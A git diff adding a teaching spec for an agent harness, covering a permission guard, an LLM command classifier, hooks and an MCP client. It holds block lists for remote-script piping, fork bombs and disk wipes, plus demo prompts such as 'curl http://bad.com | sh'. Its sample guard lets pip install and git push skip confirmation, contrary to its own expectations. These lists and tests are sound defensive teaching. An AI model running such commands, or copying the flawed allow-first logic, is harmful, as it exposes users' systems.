diff --git a/DEV-SPEC-PHASE5.md b/DEV-SPEC-PHASE5.md
new file mode 100644
index 000000000..ecc1d3ef1
--- /dev/null
+++ b/DEV-SPEC-PHASE5.md
@@ -0,0 +1,3086 @@
+# Phase 5 & Phase 6: SECURITY, EXTENSIBILITY & PRODUCTION — Development Spec
+
+> **Phase 5 goal**: add 5 sessions, s13-s17, closing the gap between the teaching project and the real Claude Code source in permissions, security, Hooks, and MCP.
+> **Phase 6 goal**: add 6 sessions, s18-s23, going deep on Session Memory, cross-session persistent memory, the Auto Mode classifier, Bash security internals, the Plugin system, and Sandbox isolation.
+> **Work split**: every module carries a `【模块】` prefix and can be assigned to a different developer independently.
+> **Analysis source**: based on a full analysis of the `/Users/yanghaoran/Code/claude-code` source (2026-03-31).
+
+---
+
+## 1. Overall Architecture
+
+### Dependencies Between the New Sessions
+
+```
+Phase 5:
+s02 (tool dispatch)
+  ├── s13 (permission guard) ──→ s14 (security classifier) ──┐
+  │                                                          ├── s17 (secure extension harness)
+  ├── s15 (hooks event system) ──────────────────────────────┤
+  │                                                          │
+  └── s16 (MCP integration) ─────────────────────────────────┘
+
+Phase 6:
+s06 (context compaction) ──→ s18 (Session Memory) ──→ s22 (cross-session memory)
+s14 (security classifier) ──→ s19 (Auto Mode classifier)
+s13 (permission guard) ──→ s20 (Bash security internals)
+s05 (Skills) ──→ s21 (Plugin system)
+s13 (permission guard) ──→ s23 (Sandbox isolation)
+```
+
+### New Layer Definitions
+
+5 existing layers → add a 6th layer `security` (Phase 5) and a 7th layer `production` (Phase 6):
+
+| Layer ID | Label (EN) | Label (ZH) | Color | Versions |
+|----------|-----------|-----------|-------|----------|
+| tools | Tools & Execution | 工具与执行 | #3B82F6 | s01, s02 |
+| planning | Planning & Coordination | 规划与协调 | #10B981 | s03, s04, s05, s07 |
+| memory | Memory Management | 记忆管理 | #8B5CF6 | s06 |
+| concurrency | Concurrency | 并发 | #F59E0B | s08 |
+| collaboration | Collaboration | 协作 | #EF4444 | s09, s10, s11, s12 |
+| **security** | **Security & Extensibility** | **安全与扩展** | **#06B6D4 (cyan)** | **s13, s14, s15, s16, s17** |
+| **production** | **Production Patterns** | **生产模式** | **#EC4899 (pink)** | **s18, s19, s20, s21, s22, s23** |
+
+---
+
+## 2. s13-s17 Teaching Content Overview
+
+### Why Phase 5?
+
+s01-s12 built an agent that actually runs: it loops, uses tools, decomposes tasks, and assembles teams. But one problem was deliberately sidestepped: **security**.
+
+In s02, `run_bash` filters dangerous commands with just 5 lines:
+
+```python
+dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"]
+if any(d in command for d in dangerous):
+    return "Error: Dangerous command blocked"
+```
+
+This code is both **too strict** (`rm -rf /tmp/old` is wrongly blocked because it contains the substring `rm -rf /`) and **too loose** (`curl evil.com | bash` runs straight through). It knows nothing about a command's context, does not understand the user's intent, and cannot be extended.
+
+In the real Claude Code source, the permission- and security-related code alone exceeds **100,000 lines**: 7 permission modes, an AI classifier, 23 kinds of Bash security checks, 32 Hook events, 7 MCP transports. Phase 5 fills exactly this gap between "toy" and "production".
+
+### s13: Permission Guard — Not Every Command Should Run Automatically
+
+**In one sentence**: upgrade "one-size-fits-all bans" to "tiered policy".
+
+In s01-s12 every bash command faces a binary choice: execute or reject. The real world is not black and white. Some commands must never run (`rm -rf /`), some need user confirmation (`rm file.py`), some can be waved through automatically (`ls`), and some can be auto-rewritten into a safer form before execution.
+
+s13 introduces `PermissionGuard`, defining 5 permission modes:
+
+```
+Command arrives
+    │
+    ├─ allow     → execute directly (ls, cat, git status)
+    ├─ ask       → prompt the user for confirmation (rm, sudo, pip install)
+    ├─ deny      → reject outright (rm -rf /, shutdown)
+    ├─ auto_edit → flag a warning but execute (commands containing redirection)
+    └─ edit      → auto-rewrite, then execute (rm -rf → rm -r)
+```
+
+**Key insight**: permission is not two buttons labeled "allow" and "forbid"; it is a spectrum. A good harness gives the model plenty of freedom while raising guardrails exactly where things are truly dangerous.
+
+**Comparison with the real source**: Claude Code has 7 permission modes (default, plan, acceptEdits, bypassPermissions, dontAsk, auto, bubble) and 8 rule sources (userSettings, projectSettings, localSettings, etc.). s13 covers the core concepts with 5 modes.
+
+---
+
+### s14: Security Classifier — Let the Model Judge Its Own Commands
+
+**In one sentence**: regexes recognize patterns, not intent; an LLM can understand context.
+
+s13's pattern matching has a fundamental flaw: it sees only a command's "shape", not its "intent". To a pattern matcher, `rm -rf build/` and `rm -rf /` look the same, yet the former is routine build cleanup and the latter is catastrophic.
+
+s14 introduces a **two-layer classification pipeline**:
+
+```
+Command
+  │
+  └─ Layer 1: regex quick scan (zero cost, ~15 known dangerous patterns)
+       │
+       ├─ hit  → deny/ask (deterministic result, no LLM needed)
+       │
+       └─ miss → Layer 2: LLM classification (~10 tokens/call)
+            │
+            ├─ safe      → allow
+            ├─ moderate  → ask (user confirmation required)
+            └─ dangerous → deny
+```
+
+The regex quick scan handles known threats (fast and free); the LLM classifier handles unknown commands (understands context, judges intent). Together the two layers are both efficient and accurate.
+
+**Key insight**: the LLM classifier is not a "fancier regex" but an entirely different approach to security: from "matching dangerous patterns" to "understanding command intent". The model can tell `rm -rf node_modules/` (routine cleanup) apart from `rm -rf ~` (disaster) because the two are semantically completely different.
+
+**Comparison with the real source**: Claude Code's `yoloClassifier` is a 52KB security classifier that analyzes the entire conversation history to judge a command's safety. `bashSecurity.ts` contains 23 check patterns covering command-substitution detection, heredoc injection, dangerous Zsh commands, and more. s14 covers the core idea with a two-layer pipeline.
+
+---
+
+### s15: Hooks System — Insert an Interception Layer Between the Model and the Tools
+
+**In one sentence**: change a tool's behavior without changing the tool's code.
+
+The security checks of s13-s14 are hardcoded inside `run_bash`. To implement "auto git add after every file write" or "write an audit log before every bash command", you would have to edit every tool function's source. That violates the open-closed principle.
+
+s15 introduces `HookManager`, defining interception points "before" and "after" tool execution:
+
+```
+LLM calls a tool
+  │
+  ▼
+[Pre-tool Hook] ──block──> return "blocked by hook"
+  │
+  ▼
+[run tool handler]
+  │
+  ▼
+[Post-tool Hook] ──observe──> write logs, trigger side effects
+  │
+  ▼
+return result
+```
+
+Hooks come in 3 modes: **observe** (watch, never change), **modify** (alter arguments or results), **block** (intercept outright). The teaching version implements 8 events (PreToolUse, PostToolUse, PreBash, PostBash, AgentStart, AgentStop, OnError, OnCompact), covering the full lifecycle of tool execution.
+
+**Key insight**: hooks move "security checks" from inside the tools to outside them. Tools just do their own job (run commands, read and write files); all interception logic belongs to hooks. That means you can register new hooks dynamically without modifying any tool code.
+
+**Comparison with the real source**: Claude Code has 32 hook events and 3 execution styles (Shell Hook, Agent Hook, HTTP Hook). The teaching version covers the core concepts with 8 events + 3 modes, and ships 3 built-in demo hooks (audit log, dangerous-command block, auto git add).
+
+---
+
+### s16: MCP Client — Tools Need Not Be Built In; External Servers Can Provide Them
+
+**In one sentence**: upgrade tool dispatch from a Python dict to a network protocol.
+
+Every tool in s02-s15 is a Python function hardcoded in the `TOOL_HANDLERS` dict. To add a "query the database" tool you would have to write Python code and restart the process. In the real world, tools can come from anywhere: database queries, API calls, file analyzers...
+
+s16 introduces an MCP (Model Context Protocol) client that connects to external tool servers over a standard protocol:
+
+```
+Agent starts
+  │
+  ▼
+[MCPClient connects to a stdio server]
+  │
+  ▼
+[discover_tools() finds external tools]  ← JSON-RPC: tools/list
+  │
+  ▼
+[register into TOOL_HANDLERS]  ← dynamic extension, no source changes
+  │
+  ▼
+agent_loop runs as normal
+LLM calls "count_lines" → MCP routes it → the external server executes
+```
+
+MCP's core idea is **protocol unification**: whether a tool lives in a local subprocess (stdio) or behind a remote HTTP endpoint, discovery, invocation, and results all go through the same JSON-RPC protocol. The teaching version supports 2 transports (stdio and streamable_http) and ships a mock file-analysis server for demos.
+
+**Key insight**: MCP turns a "tool" from a Python function into a **network service**. Anyone can write a tool server in any language; the agent only needs to speak the protocol to call it. It is the move from "monolith" to "microservice architecture".
+
+**Comparison with the real source**: Claude Code's MCP client (`services/mcp/client.ts`) is 119KB, supporting 7 transports (stdio, sse, sse-ide, http, ws, ws-ide, sdk) plus OAuth authentication (89KB). The teaching version covers the core concepts with 2 transports and a built-in mock server.
+
+---
+
+### s17: Secure Extension Harness — Four Lines of Defense, One Loop
+
+**In one sentence**: each layer has a clear responsibility and stays out of the others' way; that is the heart of a production-grade harness.
+
+Each of s13-s16 is an independent agent that runs on its own. A real system needs all the layers working at once. s17 composes them into one clear execution pipeline:
+
+```
+LLM calls a tool
+  │
+  ▼
+[1] PreToolUse Hook ──block──> return error        ← s15
+  │
+  ▼
+[2] Security Classifier ──deny───> return error    ← s14
+  │
+  ▼
+[3] Permission Guard ──deny───> return error       ← s13
+  │                  ──ask────> user confirms
+  │
+  ▼
+[4] Execute (built-in or MCP)                      ← s02 + s16
+  │
+  ▼
+[5] PostToolUse Hook (audit log)                   ← s15
+  │
+  ▼
+return result
+```
+
+Each layer answers exactly one question:
+- Hook: "does this action need to be intercepted?"
+- Classifier: "what is this command's intent?"
+- Permission: "is that intent allowed?"
+- Execute: "run it and return the result"
+
+The layers do not talk to each other and are not coupled. You can pull any layer out and the others are unaffected.
+
+**Key insight**: the heart of a production harness is not "many features" but "clean responsibilities". Each layer is an independent policy unit that can be tested, replaced, and switched off on its own. With this architecture, a new security threat means adding one layer, not rewriting the whole system.
+
+**Comparison with the real source**: Claude Code's `execute_tool` pipeline has even more layers: prompt-cache checks, token-budget checks, concurrency-safety checks, result-size truncation, and so on. But the core architecture matches s17: pre-checks → execute → post-processing.
+
+---
+
+### Phase 5 Course Summary
+
+| Session | Core question | Answer | New mechanism |
+|------|---------|------|---------|
+| **s13** | Who decides whether a command may run? | A permission policy | PermissionGuard (5 modes) |
+| **s14** | How do we tell whether a command is dangerous? | Two-layer classification | SecurityClassifier (regex + LLM) |
+| **s15** | Where do we intercept tool calls? | Lifecycle instrumentation | HookManager (8 events, 3 modes) |
+| **s16** | How do we plug in external tools? | A standard protocol | MCPClient + MCPManager (stdio/http) |
+| **s17** | How do all the layers cooperate? | An execution pipeline | 5-stage pipeline: Hook → Classify → Permission → Execute → PostHook |
+
+---
+
+## 4. Backend Course Files (Python)
+
+### 【模块 A】s13: Permission Guard
+
+**File**: `agents/s13_permission_guard.py`
+**Estimated lines**: ~230
+**Depends on**: s02
+
+#### File header template
+
+```python
+#!/usr/bin/env python3
+# Harness: permission guard -- not every command should run automatically.
+"""
+s13_permission_guard.py - Permission Guard
+
+The 5-line string filter from s02 was a toy. Real systems need a
+permission model: allow / ask / deny / auto-edit / edit.
+ + Command flow: + + LLM calls bash tool + | + v + +------------------+ + | PermissionGuard | + | classify() | + +--------+---------+ + | + +-------+-------+-------+-------+ + | | | | | + [allow] [ask] [deny] [auto] [edit] + | | | | | + v v v v v + execute prompt block flag rewrite + user edit in-place + +Key insight: "把 '禁止' 升级为 '策略' -- 从一条 if 到一个权限模型。" +""" +``` + +#### 常量定义 + +```python +PERMISSION_MODES = ("allow", "ask", "deny", "auto_edit", "edit") + +# 自动放行的命令基础名 +ALLOWED_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", +} + +# 始终拒绝的模式 (正则) +DENIED_PATTERNS = [ + (r"rm\s+-rf\s+/(?!\w)", "Root directory recursive delete"), + (r"sudo\s+rm", "sudo + rm"), + (r">\s*/etc/", "Overwrite system config"), + (r"mkfs\.", "Format filesystem"), + (r"dd\s+.*of=/dev/", "Raw disk write"), + (r":\(\)\{.*:\|:&\}", "Fork bomb"), + (r"shutdown|reboot|halt|poweroff", "System shutdown"), + (r"chmod\s+-R\s+777\s+/", "Recursive 777 on root"), + (r"curl.*\|\s*(ba)?sh", "Remote script execution"), + (r"wget.*\|\s*(ba)?sh", "Remote script execution"), +] + +# 需要用户确认的模式 +ASK_PATTERNS = [ + (r"rm\s+", "File deletion"), + (r"sudo\s+", "Elevated privileges"), + (r"pip\s+install", "Package installation"), + (r"npm\s+install", "Package installation"), + (r"git\s+push", "Git push"), + (r"git\s+reset", "Git reset"), + (r"docker\s+rm", "Docker remove"), + (r"kill\s+", "Process termination"), +] + +# 命令改写规则: (匹配模式, 替换) -- 仅示例 +EDIT_REWRITE_RULES = [ + (r"rm\s+-rf\s+(.*)", r"rm -r \1 # auto-removed -f flag"), +] +``` + +#### 核心类 + +```python +import re +from dataclasses import dataclass +from pathlib import Path + +@dataclass +class PermissionResult: + mode: str # allow / ask / deny / auto_edit / edit + allowed: bool + command: str # 可能被改写后的命令 + reason: str + +class PermissionGuard: + def __init__(self, config_path: Path = None): + """可从 .permissions.json 
加载自定义规则覆盖默认规则""" + self._denied = [(re.compile(p), r) for p, r in DENIED_PATTERNS] + self._ask = [(re.compile(p), r) for p, r in ASK_PATTERNS] + self._edit = [(re.compile(p), r) for p, r in EDIT_REWRITE_RULES] + # TODO: load from config_path if provided + + def classify(self, command: str) -> tuple[str, str]: + """返回 (mode, reason)""" + # 1. deny 检查 + for pat, reason in self._denied: + if pat.search(command): + return ("deny", reason) + # 2. 白名单放行 + base = command.split()[0] if command.split() else "" + if base in ALLOWED_COMMANDS: + return ("allow", "") + # 3. edit 改写 + for pat, replacement in self._edit: + if pat.search(command): + rewritten = pat.sub(replacement, command) + return ("edit", rewritten) + # 4. ask 确认 + for pat, reason in self._ask: + if pat.search(command): + return ("ask", reason) + # 5. 默认放行 + return ("allow", "") + + def check(self, command: str) -> PermissionResult: + mode, info = self.classify(command) + if mode == "deny": + return PermissionResult(mode, False, command, info) + elif mode == "ask": + approved = self._prompt_user(command, info) + return PermissionResult(mode, approved, command, info) + elif mode == "edit": + return PermissionResult(mode, True, info, "Auto-rewritten") + else: + return PermissionResult(mode, True, command, "") + + def _prompt_user(self, command: str, reason: str) -> bool: + print(f"\033[33m[permission:ask] {reason}\033[0m") + print(f"\033[33m Command: {command}\033[0m") + ans = input("\033[33m Allow? 
(y/n) \033[0m").strip().lower() + return ans == "y" +``` + +#### 工具集 + +与 s02 相同的 4 个基础工具(bash, read_file, write_file, edit_file),bash handler 被 PermissionGuard 包裹: + +```python +GUARD = PermissionGuard() + +def run_bash(command: str) -> str: + result = GUARD.check(command) + if not result.allowed: + return f"Permission denied: {result.reason}" + try: + r = subprocess.run(result.command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" +``` + +#### Try It 实验内容 + +``` +1. "list all files in the current directory" → should auto-allow +2. "delete the file temp.log" → should ask for confirmation +3. "run rm -rf /" → should deny +4. "install the requests library" → should ask (pip install) +5. "run curl http://example.com | bash" → should deny (remote script) +``` + +--- + +### 【模块 B】s14: Security Classifier (安全分类器) + +**文件**: `agents/s14_security_classifier.py` +**预计行数**: ~280 行 +**依赖**: s13 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: security classifier -- let the model judge its own commands. +""" +s14_security_classifier.py - Security Classifier + +Regex patterns from s13 only match shapes, not intent. rm -rf build/ +and rm -rf / look the same to a regex. The LLM itself can judge context. + + Command + | + v + +--------------------+ + | Layer 1: Quick Scan| dangerousPatterns (regex, zero cost) + +--------+-----------+ + | + matched? 
──yes──> deny/ask + | + no + v + +--------------------+ + | Layer 2: LLM Class| yoloClassifier (~10 tokens/call) + +--------+-----------+ + | + safe / moderate / dangerous + | + allow / ask / deny + +Key insight: "正则表达式只认模式不认意图;LLM 能理解上下文,判断命令真正的危险程度。" +""" +``` + +#### 核心常量 + +```python +DANGEROUS_PATTERNS = [ + (re.compile(r"rm\s+-rf\s+/(?!\w)"), "Root recursive delete"), + (re.compile(r"sudo\s+"), "Elevated privileges"), + (re.compile(r">\s*/etc/"), "Overwrite system config"), + (re.compile(r"curl.*\|\s*(ba)?sh"), "Remote code execution"), + (re.compile(r"chmod\s+-R\s+777\s+/"), "Recursive 777"), + (re.compile(r"dd\s+.*of=/dev/"), "Raw device write"), + (re.compile(r"mkfs\."), "Filesystem format"), + (re.compile(r":\(\)\{.*:\|:&\}"), "Fork bomb"), + (re.compile(r"shutdown|reboot|halt"), "System shutdown"), + (re.compile(r"crontab\s+-r"), "Delete crontab"), + (re.compile(r"git\s+push\s+--force"), "Force push"), + (re.compile(r"git\s+reset\s+--hard"), "Hard reset"), + (re.compile(r"npm\s+publish"), "Publish package"), + (re.compile(r"docker\s+(rm|rmi).*--force"), "Force remove container"), + (re.compile(r">\s*/dev/sd"), "Write to raw disk"), +] + +SAFE_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", "tree", "du", + "stat", "date", "whoami", "hostname", "uname", +} + +CLASSIFIER_PROMPT = """Classify this shell command's danger level. +Reply with EXACTLY one word: safe, moderate, or dangerous. 
+ +- safe: read-only or non-destructive (ls, cat, git status) +- moderate: writes files but recoverable (rm single file, pip install) +- dangerous: irreversible or system-wide (rm -rf /, sudo, force push) + +Command: {command} +Context (last task): {context}""" +``` + +#### 核心类 + +```python +class SecurityClassifier: + def __init__(self, client, model): + self.client = client + self.model = model + + def quick_scan(self, command: str) -> tuple[str, str] | None: + """Layer 1: 正则快筛。返回 (level, reason) 或 None""" + for pat, reason in DANGEROUS_PATTERNS: + if pat.search(command): + return ("dangerous", reason) + return None + + def llm_classify(self, command: str, context: str = "") -> str: + """Layer 2: LLM 分类。返回 safe/moderate/dangerous""" + prompt = CLASSIFIER_PROMPT.format(command=command, context=context[-300:]) + resp = self.client.messages.create( + model=self.model, + messages=[{"role": "user", "content": prompt}], + max_tokens=10, + ) + answer = resp.content[0].text.strip().lower() + # 容错:只取第一个有效词 + for level in ("safe", "moderate", "dangerous"): + if level in answer: + return level + return "moderate" # 默认中等风险 + + def classify(self, command: str, context: str = "") -> dict: + """完整分类管线""" + # Layer 1 + quick = self.quick_scan(command) + if quick: + level, reason = quick + mode = {"dangerous": "deny", "moderate": "ask"}.get(level, "deny") + return {"level": level, "mode": mode, "reason": reason, "source": "pattern"} + + # 白名单 + base = command.split()[0] if command.split() else "" + if base in SAFE_COMMANDS: + return {"level": "safe", "mode": "allow", "reason": "", "source": "whitelist"} + + # Layer 2 + level = self.llm_classify(command, context) + mode = {"safe": "allow", "moderate": "ask", "dangerous": "deny"}[level] + return {"level": level, "mode": mode, "reason": f"LLM classified as {level}", "source": "llm"} +``` + +#### PermissionGuard 改造 + +```python +class PermissionGuard: + def __init__(self, classifier: SecurityClassifier = None): + self.classifier = 
classifier + + def check(self, command: str, context: str = "") -> PermissionResult: + if self.classifier: + result = self.classifier.classify(command, context) + mode = result["mode"] + if mode == "deny": + return PermissionResult("deny", False, command, result["reason"]) + elif mode == "ask": + approved = self._prompt_user(command, result["reason"]) + return PermissionResult("ask", approved, command, result["reason"]) + else: + return PermissionResult("allow", True, command, "") + # fallback to s13 pattern matching + ... +``` + +#### Try It 实验内容 + +``` +1. "delete the build/ directory" → LLM 应判断为 moderate (ask) +2. "list all python files" → quick scan whitelist -> allow +3. "run git push --force origin main" → quick scan pattern -> deny +4. "run pip install numpy" → LLM 应判断为 moderate (ask) +5. "create a new file called test.py" → LLM 应判断为 safe (allow) +``` + +--- + +### 【模块 C】s15: Hooks System (Hooks 事件系统) + +**文件**: `agents/s15_hooks_system.py` +**预计行数**: ~300 行 +**依赖**: s13 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: hooks system -- intercept between model and tool. +""" +s15_hooks_system.py - Hooks System + +Security checks from s13-s14 are hardcoded inside handlers. +Hooks let you intercept, modify, or block tool calls without +touching any handler code. 
+ + LLM calls tool + | + v + +-------------------+ + | Pre-tool Hook | ──block──> return "blocked by hook" + +--------+----------+ + | (if not blocked) + v + +-------------------+ + | Execute handler | + +--------+----------+ + | + v + +-------------------+ + | Post-tool Hook | (observe/log/modify result) + +--------+----------+ + | + v + return result + +Key insight: "Hooks 不改变工具的行为,但改变了工具何时、如何、是否被执行。" +""" +``` + +#### 核心常量 + +```python +HOOK_EVENTS = ( + "PreToolUse", # 工具执行前 + "PostToolUse", # 工具执行后 + "PreBash", # bash 执行前 (更细粒度) + "PostBash", # bash 执行后 + "AgentStart", # agent_loop 启动 + "AgentStop", # agent_loop 结束 + "OnError", # 工具出错 + "OnCompact", # 上下文压缩 +) + +HOOK_MODES = ("observe", "modify", "block") +``` + +#### 核心类 + +```python +from dataclasses import dataclass, field +from typing import Callable +from pathlib import Path +import json + +@dataclass +class Hook: + event: str + mode: str + handler: Callable + name: str + description: str = "" + tool_filter: str | None = None # 仅匹配特定工具 + +class HookManager: + def __init__(self, hooks_dir: Path = None): + self._hooks: dict[str, list[Hook]] = {e: [] for e in HOOK_EVENTS} + self._hooks_dir = hooks_dir or WORKDIR / ".hooks" + self._hooks_dir.mkdir(exist_ok=True) + self._load_defaults() + + def _load_defaults(self): + """注册 3 个内置 hook""" + # 1. bash 审计日志 + self.register("PreBash", "observe", self._audit_log, + "bash_audit_log", "Log all bash commands to audit.jsonl") + # 2. 危险命令拦截 (与 s13 协同) + self.register("PreBash", "block", self._dangerous_block, + "dangerous_command_block", "Block known dangerous patterns") + # 3. 
自动 git add + self.register("PostToolUse", "observe", self._auto_git_add, + "auto_git_add", "Auto git add after write/edit", + tool_filter="write_file") + + def register(self, event: str, mode: str, handler: Callable, + name: str, description: str = "", tool_filter: str = None): + hook = Hook(event, mode, handler, name, description, tool_filter) + self._hooks[event].append(hook) + + def unregister(self, name: str): + for event in self._hooks: + self._hooks[event] = [h for h in self._hooks[event] if h.name != name] + + def fire(self, event: str, context: dict) -> dict | None: + """ + 返回 None = 继续 + 返回 {"action": "block", "reason": "..."} = 阻止 + 返回 {"action": "modify", **overrides} = 修改参数 + """ + for hook in self._hooks.get(event, []): + # tool_filter 检查 + if hook.tool_filter and context.get("tool") != hook.tool_filter: + continue + result = hook.handler(context) + if result is None: + continue # observe + if isinstance(result, str): + return {"action": "block", "reason": result, "hook": hook.name} + if isinstance(result, dict): + if result.get("action") == "block": + return result + if result.get("action") == "modify": + context.update(result.get("modify", {})) + return None + + def list_hooks(self) -> str: + lines = [] + for event, hooks in self._hooks.items(): + for h in hooks: + lines.append(f" {event:15} [{h.mode:7}] {h.name}: {h.description}") + return "\n".join(lines) + + # --- 内置 Hook 处理函数 --- + + def _audit_log(self, context: dict) -> None: + log_file = self._hooks_dir / "audit.jsonl" + entry = {"tool": context.get("tool"), "command": context.get("input", {}).get("command")} + log_file.open("a").write(json.dumps(entry) + "\n") + + def _dangerous_block(self, context: dict) -> str | None: + cmd = context.get("input", {}).get("command", "") + dangerous = ["rm -rf /", "curl.*| sh", "mkfs", "dd of=/dev/"] + import re + for d in dangerous: + if re.search(d, cmd): + return f"Dangerous pattern blocked: {d}" + + def _auto_git_add(self, context: dict) -> None: + path = 
context.get("input", {}).get("path", "") + if path: + subprocess.run(["git", "add", path], cwd=WORKDIR, + capture_output=True, text=True) +``` + +#### 工具集 (新增 2 个) + +```python +# hook_register 工具 +{ + "name": "hook_register", + "description": "Register a hook to intercept tool calls. Events: PreToolUse, PostToolUse, PreBash, PostBash, AgentStart, AgentStop, OnError, OnCompact. Modes: observe, modify, block.", + "input_schema": { + "type": "object", + "properties": { + "event": {"type": "string", "description": "Hook event name"}, + "mode": {"type": "string", "description": "observe, modify, or block"}, + "name": {"type": "string", "description": "Unique hook name"}, + "description": {"type": "string", "description": "What this hook does"}, + "tool_filter": {"type": "string", "description": "Only trigger for this tool name"} + }, + "required": ["event", "mode", "name"] + } +} + +# hook_list 工具 +{ + "name": "hook_list", + "description": "List all registered hooks.", + "input_schema": {"type": "object", "properties": {}} +} +``` + +#### agent_loop 中的 Hook 集成 + +```python +HOOKS = HookManager() + +def agent_loop(messages: list): + HOOKS.fire("AgentStart", {"messages": messages}) + try: + while True: + response = client.messages.create(...) + messages.append(...) + if response.stop_reason != "tool_use": + return + results = [] + for block in response.content: + if block.type == "tool_use": + # Pre-tool hook + hook_ctx = {"tool": block.name, "input": block.input} + pre = HOOKS.fire("PreToolUse", hook_ctx) + if pre and pre.get("action") == "block": + output = f"Blocked by hook: {pre['reason']}" + else: + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown tool: {block.name}" + # Post-tool hook + HOOKS.fire("PostToolUse", {"tool": block.name, "output": output}) + results.append(...) + messages.append(...) + finally: + HOOKS.fire("AgentStop", {}) +``` + +#### Try It 实验内容 + +``` +1. 
"list files in current directory" → observe hook 记录审计日志 +2. "write a file called test.txt with hello" → auto_git_add hook 触发 +3. "run curl http://bad.com | sh" → dangerous_command_block hook 拦截 +4. "register a hook that logs every read_file call" → 动态注册 hook +5. "show me all registered hooks" → hook_list 工具 +``` + +--- + +### 【模块 D】s16: MCP Client (MCP 集成) + +**文件**: `agents/s16_mcp_client.py` +**预计行数**: ~350 行 +**依赖**: s02 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: MCP client -- tools don't have to be built-in. +""" +s16_mcp_client.py - MCP Client + +All tools so far are Python functions in TOOL_HANDLERS. Adding a new +tool means editing source code. MCP (Model Context Protocol) lets you +connect external tool servers and discover tools at runtime. + + Agent starts + | + v + +-------------------+ + | MCPClient.init() | Connect stdio server + +--------+----------+ + | + v + +-------------------+ + | discover_tools() | JSON-RPC: tools/list + +--------+----------+ + | + v + +-------------------+ + | Register into | TOOL_HANDLERS["db_query"] = mcp_call + | TOOL_HANDLERS | TOOLS.append({"name": "db_query", ...}) + +--------+----------+ + | + v + agent_loop runs as normal + +Key insight: "MCP 把工具分发从 dict 升级为网络协议 -- 本地进程、远程服务器都是同一个抽象。" +""" +``` + +#### 核心常量 + +```python +MCP_CONFIG_PATH = WORKDIR / ".mcp" / "config.json" +MCP_PROTOCOL_VERSION = "2024-11-05" +``` + +#### 核心类 + +```python +import subprocess +import json +from dataclasses import dataclass + +@dataclass +class MCPServerConfig: + name: str + transport: str # "stdio" | "streamable_http" + command: str = "" # stdio: 启动命令 + url: str = "" # http: 端点 URL + args: list = None + env: dict = None + +class MCPClient: + def __init__(self, config: MCPServerConfig): + self.config = config + self.process = None + self._id = 0 + + def start(self): + if self.config.transport == "stdio": + self.process = subprocess.Popen( + self.config.command.split(), + stdin=subprocess.PIPE, stdout=subprocess.PIPE, + 
stderr=subprocess.PIPE, cwd=WORKDIR, + ) + + def _next_id(self) -> int: + self._id += 1 + return self._id + + def _send_rpc(self, method: str, params: dict = None) -> dict: + request = {"jsonrpc": "2.0", "method": method, "id": self._next_id()} + if params: + request["params"] = params + data = json.dumps(request) + "\n" + self.process.stdin.write(data.encode()) + self.process.stdin.flush() + line = self.process.stdout.readline().decode().strip() + return json.loads(line).get("result", {}) if line else {} + + def discover_tools(self) -> list: + result = self._send_rpc("tools/list") + return result.get("tools", []) + + def call(self, tool_name: str, arguments: dict) -> str: + result = self._send_rpc("tools/call", { + "name": tool_name, "arguments": arguments + }) + contents = result.get("content", []) + return "\n".join(c.get("text", "") for c in contents if c.get("type") == "text") + + def shutdown(self): + if self.process: + self.process.terminate() + self.process.wait(timeout=5) + +class MCPManager: + def __init__(self, config_path: Path = None): + self._clients: dict[str, MCPClient] = {} + self._tools: dict[str, tuple[str, dict]] = {} # tool_name -> (server_name, schema) + self._config_path = config_path or MCP_CONFIG_PATH + + def load_config(self) -> list[MCPServerConfig]: + if not self._config_path.exists(): + return [] + data = json.loads(self._config_path.read_text()) + servers = data.get("mcpServers", {}) + return [MCPServerConfig(name=k, **v) for k, v in servers.items()] + + def connect_all(self) -> list[dict]: + """连接所有配置的服务器,返回发现的工具列表""" + discovered = [] + for config in self.load_config(): + client = MCPClient(config) + client.start() + tools = client.discover_tools() + self._clients[config.name] = client + for tool in tools: + self._tools[tool["name"]] = (config.name, tool) + discovered.append(tool) + return discovered + + def call(self, tool_name: str, arguments: dict) -> str: + if tool_name not in self._tools: + return f"Unknown MCP tool: 
{tool_name}" + server_name, _ = self._tools[tool_name] + return self._clients[server_name].call(tool_name, arguments) + + def shutdown_all(self): + for client in self._clients.values(): + client.shutdown() + + def list_servers(self) -> str: + lines = [] + for name, client in self._clients.items(): + tools = [t for t, (s, _) in self._tools.items() if s == name] + lines.append(f" {name} ({client.config.transport}): {len(tools)} tools") + return "\n".join(lines) +``` + +#### Mock MCP Server (教学用) + +```python +# 内置在 s16 文件中,用于演示,不需要外部依赖 +class MockMCPServer: + """一个简单的文件分析 MCP 服务器,作为教学演示""" + + TOOLS = [ + { + "name": "count_lines", + "description": "Count lines in a file", + "inputSchema": { + "type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"], + }, + }, + { + "name": "search_content", + "description": "Search for a pattern in files", + "inputSchema": { + "type": "object", + "properties": { + "pattern": {"type": "string"}, + "path": {"type": "string"}, + }, + "required": ["pattern"], + }, + }, + ] + + def handle(self, method: str, params: dict) -> dict: + if method == "tools/list": + return {"tools": self.TOOLS} + elif method == "tools/call": + name = params.get("name") + args = params.get("arguments", {}) + if name == "count_lines": + path = safe_path(args.get("path", "")) + count = len(path.read_text().splitlines()) if path.exists() else 0 + return {"content": [{"type": "text", "text": f"{count} lines"}]} + elif name == "search_content": + import re + pattern = args.get("pattern", "") + results = [] + for f in WORKDIR.rglob("*.py"): + for i, line in enumerate(f.read_text().splitlines(), 1): + if re.search(pattern, line): + results.append(f"{f.name}:{i}: {line.strip()}") + text = "\n".join(results[:20]) or "No matches found" + return {"content": [{"type": "text", "text": text}]} + return {} +``` + +#### MCP 配置文件示例 + +**文件**: `.mcp/config.json` + +```json +{ + "mcpServers": { + "file-analyzer": { + "transport": "stdio", + 
